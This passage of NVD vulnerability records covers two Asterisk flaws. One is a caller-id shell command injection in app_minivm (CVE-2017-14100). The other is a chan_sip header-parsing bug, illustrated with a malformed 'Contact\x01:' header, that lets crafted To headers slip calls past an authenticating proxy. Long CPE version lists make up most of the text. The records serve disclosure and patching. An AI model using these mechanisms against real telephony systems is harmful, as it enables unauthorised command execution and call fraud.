              "matchCriteriaId": "C7D60B24-C509-49C3-87A9-49D05CB44183",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "3C1F9978-44E7-4D39-BEC6-5C6DB7F893E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "69BA61A8-2A95-4800-BB4E-692BA4321A84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "C481D8B0-622D-491D-B292-717B0369B507",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "BC8390D4-F339-43FF-9F2B-71331D4ECB81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "4490B76B-FA41-43DB-9A31-6B3F220F1907",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "0449B393-FA4E-4664-8E16-BE6B94E4872F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2ED8E415-64FA-4E77-A423-3478E606E58E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E13CA1DD-B384-4408-B4EC-1AA829981016",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE28BD0A-EA30-4265-A5D6-0390F3558D44",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc4:*:*:*:*:*:*",
              "matchCriteriaId": "0F82048D-C65F-4439-BBE4-2D4A9B07EB7E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "6447B77F-3770-4703-9188-B7344ED98E94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "5C103924-1D61-4090-8ED5-4731371B2B2C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "08F87B09-3867-4CAE-BAD7-2206CD6CAF97",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "In Asterisk 11.x before 11.25.2, 13.x before 13.17.1, and 14.x before 14.6.1 and Certified Asterisk 11.x before 11.6-cert17 and 13.x before 13.13-cert5, unauthorized command execution is possible. The app_minivm module has an \"externnotify\" program configuration option that is executed by the MinivmNotify dialplan application. The application uses the caller-id name and number as part of a built string passed to the OS shell for interpretation and execution. Since the caller-id name and number can come from an untrusted source, a crafted caller-id name or number allows an arbitrary shell command injection."
    },
    {
      "lang": "es",
      "value": "En Asterisk 11.x en versiones anteriores a la 11.25.2, 13.x en versiones anteriores a la 13.17.1, y 14.x en versiones anteriores a la 14.6.1 y Certified Asterisk 11.x en versiones anteriores a la 11.6-cert17 y 13.x en versiones anteriores a la 13.13-cert5, es ejecutar comandos sin autorizaci\u00f3n. El m\u00f3dulo app_minivm tiene una opci\u00f3n de configuraci\u00f3n de programa \"externnotify\" que es ejecutada por la aplicaci\u00f3n dialplan MinivmNotify. La aplicaci\u00f3n emplea el nombre y el n\u00famero caller-id como parte de una cadena integrada pasada al shell del sistema operativopara su interpretaci\u00f3n y ejecuci\u00f3n. Debido a que el nombre y el n\u00famero caller-id pueden proceder de una fuente no confiable, un nombre o n\u00famero caller-id permite una inyecci\u00f3n arbitraria de comandos shell."
    }
  ],
  "id": "CVE-2017-14100",
  "lastModified": "2024-11-21T03:12:08.597",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-09-02T16:29:00.333",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2017-006.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2017/dsa-3964"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1039252"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://bugs.debian.org/873908"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27103"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://security.gentoo.org/glsa/201710-29"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2017-006.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2017/dsa-3964"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1039252"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://bugs.debian.org/873908"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27103"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://security.gentoo.org/glsa/201710-29"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2016-12-12 21:59

Modified

2024-11-21 03:02

Severity ?

5.3 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Summary

An issue was discovered in Asterisk Open Source 11.x before 11.25.1, 13.x before 13.13.1, and 14.x before 14.2.1 and Certified Asterisk 11.x before 11.6-cert16 and 13.x before 13.8-cert4. The chan_sip channel driver has a liberal definition for whitespace when attempting to strip the content between a SIP header name and a colon character. Rather than following RFC 3261 and stripping only spaces and horizontal tabs, Asterisk treats any non-printable ASCII character as if it were whitespace. This means that headers such as Contact\x01: will be seen as a valid Contact header. This mostly does not pose a problem until Asterisk is placed in tandem with an authenticating SIP proxy. In such a case, a crafty combination of valid and invalid To headers can cause a proxy to allow an INVITE request into Asterisk without authentication since it believes the request is an in-dialog request. However, because of the bug described above, the request will look like an out-of-dialog request to Asterisk. Asterisk will then process the request as a new call. The result is that Asterisk can process calls from unvetted sources without any authentication. If you do not use a proxy for authentication, then this issue does not affect you. If your proxy is dialog-aware (meaning that the proxy keeps track of what dialogs are currently valid), then this issue does not affect you. If you use chan_pjsip instead of chan_sip, then this issue does not affect you.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2016-009.html	Mitigation, Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/94789	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id/1037408
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2016-009.html	Mitigation, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/94789	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1037408

Impacted products

Vendor	Product	Version
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.2.1
digium	asterisk	11.2.2
digium	asterisk	11.3.0
digium	asterisk	11.4.0
digium	asterisk	11.5.0
digium	asterisk	11.5.1
digium	asterisk	11.6.0
digium	asterisk	11.6.1
digium	asterisk	11.7.0
digium	asterisk	11.8.0
digium	asterisk	11.8.1
digium	asterisk	11.9.0
digium	asterisk	11.10.0
digium	asterisk	11.10.1
digium	asterisk	11.10.2
digium	asterisk	11.11.0
digium	asterisk	11.12.0
digium	asterisk	11.12.1
digium	asterisk	11.13.0
digium	asterisk	11.13.1
digium	asterisk	11.14.0
digium	asterisk	11.14.1
digium	asterisk	11.14.2
digium	asterisk	11.15.0
digium	asterisk	11.15.1
digium	asterisk	11.16.0
digium	asterisk	11.17.0
digium	asterisk	11.17.1
digium	asterisk	11.18.0
digium	asterisk	11.19.0
digium	asterisk	11.20.0
digium	asterisk	11.21.0
digium	asterisk	11.21.1
digium	asterisk	11.21.2
digium	asterisk	11.22.0
digium	asterisk	11.22.0
digium	asterisk	11.23.0
digium	asterisk	11.23.0
digium	asterisk	11.23.1
digium	asterisk	11.24.0
digium	asterisk	11.24.1
digium	asterisk	11.25.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.1
digium	asterisk	13.0.2
digium	asterisk	13.1.0
digium	asterisk	13.1.1
digium	asterisk	13.2.0
digium	asterisk	13.2.1
digium	asterisk	13.3.0
digium	asterisk	13.3.1
digium	asterisk	13.3.2
digium	asterisk	13.4.0
digium	asterisk	13.5.0
digium	asterisk	13.6.0
digium	asterisk	13.7.0
digium	asterisk	13.7.1
digium	asterisk	13.7.2
digium	asterisk	13.8.0
digium	asterisk	13.8.0
digium	asterisk	13.8.1
digium	asterisk	13.8.2
digium	asterisk	13.9.0
digium	asterisk	13.9.1
digium	asterisk	13.10.0
digium	asterisk	13.10.0
digium	asterisk	13.11.0
digium	asterisk	13.11.1
digium	asterisk	13.11.2
digium	asterisk	13.12.0
digium	asterisk	13.12.1
digium	asterisk	13.12.2
digium	asterisk	13.13.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.1
digium	asterisk	14.0.2
digium	asterisk	14.1.0
digium	asterisk	14.1.1
digium	asterisk	14.1.2
digium	asterisk	14.2.0
digium	certified_asterisk	11.0.0
digium	certified_asterisk	11.0.0
digium	certified_asterisk	11.0.0
digium	certified_asterisk	11.1.0
digium	certified_asterisk	11.1.0
digium	certified_asterisk	11.1.0
digium	certified_asterisk	11.1.0
digium	certified_asterisk	11.2.0
digium	certified_asterisk	11.2.0
digium	certified_asterisk	11.2.0
digium	certified_asterisk	11.3.0
digium	certified_asterisk	11.3.0
digium	certified_asterisk	11.3.0
digium	certified_asterisk	11.4.0
digium	certified_asterisk	11.4.0
digium	certified_asterisk	11.4.0
digium	certified_asterisk	11.4.0
digium	certified_asterisk	11.5.0
digium	certified_asterisk	11.5.0
digium	certified_asterisk	11.5.0
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F31715AF-5A35-4D0B-8E01-BB6E4CB7E02F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D56C2C11-4B42-43AB-9DAE-61C15D107160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7BE4127D-8123-4408-86D3-08168A4501B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8836F348-66DF-43BC-9962-946018D13127",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "12745DB9-F19D-4507-A9FE-218B7BB29DB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C689A32B-E87D-492F-B3F6-7B80DFA049C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "229B7982-9775-42AA-B8F5-FE920CCAA497",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8788AF7B-CBB6-4D9D-A748-486787935A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "868865A1-E074-4DB0-A119-D24C5C53FEF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B3D89C7-909F-419A-9EE8-A1F0D02934EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "50EC8D9D-3483-4080-8000-496343BC8BFD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "24F62C78-2913-463F-B689-353AB2371E3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A70420A8-8571-4528-98E1-72BE00270C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A276363F-F897-4E6D-9D55-5F5AA73DEE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB16D9D6-A2F6-4C4B-B364-1B63B1FFB5F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0F79D5F-EB28-417A-86DF-053D6EDBA161",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C92ECBCD-1EE3-498A-B3A4-22BF8EFD2EE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4EABFC3-24FA-4441-9F2B-650D90AE5CC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2026FD07-103C-4691-AFA4-88C490382F28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "65607103-4284-430A-8212-AC1DCFFFA778",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4061B4C7-8315-450C-866A-C4F3A6BCB1A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "00099DC9-D437-429B-9D08-F0DFA4942A6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EC6047FB-D1BD-4E21-B6BC-E51374C4B0E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "89504BDC-82F7-4813-9C1E-456C9ACC6FB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "118C550E-79A8-431E-BADB-710EEEEDC6C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A62DFFE-637B-4911-B3B4-6DA4053CBDBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5DF6BC60-23F5-46A1-83F8-F4BCDEF196EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9F7C5D35-A6AE-4A2E-98C5-CB58FF22AF08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D23CE302-AC62-468C-96B3-1EF430825170",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "9DCAA174-3CA3-49DB-BA19-D2BCF4F8953F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "FD4D1A5A-99A3-4D23-B40C-BBE11EA5B325",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.19.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5EFFAE3F-3B78-49DE-8F01-2E439D9A6F7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.20.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0501E88B-986A-44C6-A6B5-F2CB9087A8B5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D3AF185-7AC6-491E-9BE0-8ECD163A3E77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "400EA2E1-B178-467F-BBC2-1B2ECEDE662A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E00A6C7-D3CF-40B5-A586-06E09C5AA1A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.22.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E25D043-EE0D-49A5-A468-03EDD9CFE0EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CA17630B-444D-4AE4-B582-F8106C4EEFDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "62A20D6B-62FE-440D-BC58-F764AAA5562B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F2AE880B-2FA2-42BB-BEBF-771E18FDA141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC982D1B-B018-474E-94BE-2157C21276C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.24.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F26815C8-8E43-4C26-947B-986EFFF0ACE1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "03E8213E-650F-4C95-B9E5-753E7784EF5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.25.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "00B8F794-A7F2-4B8F-B36C-55E61DC6939A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B635C21-C193-43AF-A139-98604F324ABF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "E93A7967-9A04-424A-BDDB-A2B8289B9AC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "8F75C9FF-6F95-4F6A-B683-FE2BEDE3AD10",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "68226156-42ED-4F0E-93E1-02DD57E582B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB2C4E1E-6B90-4DCC-BC09-7D19FBA65C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "A4EB385E-28B5-4259-9431-99E1F32D61B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "58C0FF1B-6188-4181-A139-1806328762BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "121EACD3-D5E3-4691-8024-95996865BB65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "136D6508-660E-410D-829A-7DD452BF8819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "74B23D17-7356-4D37-8C73-E87896D1335B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D5BA542E-4667-4D9E-BDAE-FED6CA63F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "83C8E7EC-0D4C-40E2-9EE1-4AB5F03464D4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "81A8A6CB-D236-4AB3-8476-C2D34DB7EF31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "599833A2-CBE9-479B-8A6E-AF79C5EED1DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B870B3B7-E8DC-45A2-8FA4-657D005D00E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "707296C4-153C-4ACF-B91A-AB5FA42260CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "905722CB-4B6C-4849-88CD-22E972432E36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5C1C39FA-EF1A-4F2B-87A0-A00BAE73C6A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "677D1211-0B07-47B9-AB7A-E820E2B29561",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:*:*:*:*:*:*:*",
